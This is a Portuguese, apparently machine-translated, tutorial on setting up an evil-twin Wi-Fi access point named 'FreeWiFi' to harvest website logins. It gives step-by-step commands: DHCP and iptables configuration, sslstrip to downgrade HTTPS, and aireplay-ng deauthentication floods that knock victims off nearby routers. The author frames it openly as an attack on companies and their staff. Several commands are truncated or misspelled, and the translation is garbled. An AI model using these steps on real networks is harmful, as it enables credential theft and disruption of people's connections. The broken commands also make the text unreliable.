Criando manualmente um AP falsificado para capturar site Logins
Nós vamos ser a criação de um ponto de acesso falso onde estaremos tirando a criptografia de sites usando HTTPS para HTTP para que possamos pegar as entradas dos campos username e password. Nós também estaremos enviando pacotes deauthentication para todos os outros roteadores nas proximidades tornando-os inúteis e forçar o usuário para fazer login no nosso ponto de acesso malicioso. Isso pode ser facilmente usado para ataques conhecidos como "ataques charco", onde atacam uma empresa onde os funcionários nem sequer percebem que eles estão em um ponto de acesso malicioso porque automaticamente conectado à um malicioso devido aos outros sendo desligamento.
Nota: Sim, eu percebo alguns sites estão utilizando TLS, por isso não vai ser capaz de capturar os logins desses sites, infelizmente, como o mecanismo de criptografia não será descriptografado. (se você sabe uma maneira de retirar a encriptação, por favor me diga!)
Requisitos e Lab:
Passo 1: Obtenha nosso gateway padrão
Abra o terminal de Kali e Linux Você pode fazer isso digitando:route -n
Passo 2: Agora vamos instalar dhcp3-server Em primeiro lugar, se você não tiver feito isso, digite:
apt-get install dhcp3-server
Agora, quando se faz a instalação, é preciso configurar o servidor DHCP, digitando:Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0 {
Option routers 192.168.1.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.1.1;
Range 192.168.1.2 192.168.1.40;
}
A
única coisa que você precisa entender aqui é a linha de nome de domínio
Opção, onde diz "FreeWiFi", você pode mudar isso para o que você quiser
chamar seu falso (e mal-intencionado) ponto de acesso. Para este tutorial, eu vou mantê-lo como FreeWiFi. Agora, apenas a ressalva de que, digitando CTRL + X e Y, em seguida, em seguida, digite.
Passo 3: Agora vamos começar modo de monitor
Para começar o modo monitor, tipo:
Agora que você tem modo monitor tudo pronto, agora vamos começar o ponto de acesso falso:
airbase-ng -c 11 -e
Agora que você começou a AP falso, no entanto, se você tentar acessá-lo, você não será capaz de fazer. Lembre-se de não fechar esse terminal como você precisa estar on-line. Passo 5: Agora vamos definir as regras de mesa IP
Há um monte de comandos aqui, então eu sugiro a criação de um shell script, e isso é como fazê-lo, primeiro tipo:
nano iptables.sh
Agora
supondo que você tenha conhecimentos básicos de networking, eu suponho
que você vai ler sobre isso e configurar manualmente algumas delas como
alguns pode não funcionar para você.#!/bin/sh
clear
ifconfig at0 192.168.1.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –t nat –A PREROUTNG –p udp –j DNAT –to
iptables –P FORWARD ACCEPT
iptables --append FORWARD –-in-interface at0 –j ACCEPT
iptables --table nat -append POSTROUTING --out-interface eth0 –j MASQUERADE
iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 10000
Em seguida, dar-lhe permissões, digitando:chmod +x iptables.sh
Em seguida, basta executá-lo digitando:./iptables.sh
Passo 6: Iniciar o servidor DHCP
Para fazer isso, basta digitar:
Eu suponho que você sabe o que essas duas ferramentas estão fazendo, então vamos começar de iniciando sslstrip:
airodump-ng
Em seguida, selecione o seu alvo e anote o seu número de canal (s) e BSSID (s). Em seguida, defina os canais, digitando:
iwconfig channel
Agora, para começar o ataque deauthentication, digite o seguinte comando:aireplay-ng -0 5000 -a --ignore-negative-one
Parabéns, você está feito, agora é só sentar e esperar que os usuários façam login e reunir seus dados.